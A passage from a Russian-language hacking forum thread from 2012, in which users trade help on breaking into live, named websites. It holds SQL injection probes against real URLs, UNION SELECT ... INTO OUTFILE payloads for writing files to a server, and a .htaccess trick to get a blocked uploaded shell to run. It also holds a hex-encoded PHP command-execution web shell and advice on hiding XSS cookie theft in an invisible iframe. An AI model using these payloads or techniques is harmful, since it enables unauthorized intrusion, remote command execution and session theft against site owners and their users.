ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

07.04.2012, 03:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
вопросов на подобии "почему молоко белое, а траву корова ест зеленую?", было предостаточно как и в этой теме, так и в комментариях к одноименным статьям, не ленимся, читаем!
p.s. кстати вопрос "почему молоко белое, а траву корова ест зеленую?", на мой взгляд гораздо интереснее, и не совсем понятно все таки почему.
p.p.s. теперь мне понятно:
Сообщение от None
Все дело в том, что появлением молока корова, как впрочем, и все млекопитающие, обязана внутренним физиологическим процессам, таким как лактация и синтез. Благодаря этим процессам вымя, прежде чем произвести молоко всасывает с крови все необходимые для этого вещества. Одним из таких веществ и является белок казеин, именно благодаря ему молоко становиться белого цвета, точнее тем мелким частицам (мицеллам), которые он образует. К слову сказать, именно казеин является основным составляющим молока, ведь процент его содержания в нем достигает 70-90%, что согласитесь немало.
|
|
|
|

07.04.2012, 11:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 9121
Репутация:
1
|
|
Приветствую, при запросе ( search_result.php?search=1 ') выдаёт
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/piluli/deploy/releases/20120405144039/public/search_result.php on line 393
стоит ли ковырять дальше ?
|
|
|
|

07.04.2012, 11:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
нет.
|
|
|
|

08.04.2012, 00:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 10263
Репутация:
0
|
|
Вопрос такого плана.
Эта вроде скуля, но не раскручивается никак. или я что то не понимаю. подскажите плиз с раскруткой.
http://bdsmpeople.ru/search/index.php?input_action=search&input_who1=&input_wh o2='&input_bdsm_position=&input_age1=&input_age2=& input_country_id=0&input_state_id=0&input_city_id= 0
параметр input_who2
вот ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND (birthday BETWEEN '19120407' AND '19940407') AND (status='0')' at line 4
|
|
|
|

08.04.2012, 01:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
У меня маленький вопросец,
залил шел через скулю
открываю его, а мне пишет
Сообщение от None
Forbidden
You don't have permission to access /uploads/shell.php on this server.
хотел создать свой .htaccess с содержимым
Сообщение от None
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
но мне пишет что етот файл уже существует, можно ли ещо чёнибуть придумать?
|
|
|
|

08.04.2012, 11:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 45774
Репутация:
26
|
|
Сообщение от qaz
qaz said:
но мне пишет что етот файл уже существует, можно ли ещо чёнибуть придумать?
хз. если ток искать другую директорию для заливки шелла.
|
|
|
|

08.04.2012, 13:18
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от Pirotexnik
Pirotexnik said:
А как слить куки на сниффер без переадресации?
site.com/index.php?id=[COLOR="Green"]"> в начале XSS, закрывать обработчик onerror и тег img не нужно.
Для незаметной эксплуатации вставляешь ссылку в скрытый фрейм и размещаешь его на своем сайте:
Внутри фрейма в атрибуте src не забывай заменять двойные кавычки на html-сущности ( ", " или "). Также внутри src не используй urlencode, как в прямой ссылке, пробелы остаются пробелами, плюсы - плюсами.
Сообщение от eclipse
eclipse said:
или через AJAX))
Домен сниффера отличается от домена XSS
|
|
|

08.04.2012, 20:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 17281
Репутация:
-4
|
|
Пытаюсь залить шелл через mysql(f_p =Y).
Мой запрос выглядит так:
Сообщение от None
1'+union+select+1,2,3,4,5,union select user() INTO OUTFILE '/www/domens/dir1/www/banner/mysql.php',7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23+--+
Вылетает такая ошибка.
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select user() INTO OUTFILE '/www/domens/dir1/www/banner/mysql.php',' at line 1
(Шелл на сайт уже заливал кто-то, сапа стоит)
|
|
|
|

08.04.2012, 20:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 124363
Репутация:
11
|
|
попробуй этот код за хексить
получится 0x3c3f2073797374656d28245f524551554553545b27636d64 275d293b203f3e
|
|
|
|

08.04.2012, 20:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 17281
Репутация:
-4
|
|
Для примера я хотел записать в файл user(), что из этого вышло можешь почитать немного выше...
Разобрался.
Сообщение от None
1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23%20and%28select%2 0%225656%22%20INTO%20OUTFILE%20%22/www/domens/dir1/www/banner/mysql.php%22%29+--+
Так выводит 13 ошибку, а это - ошибка записи.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|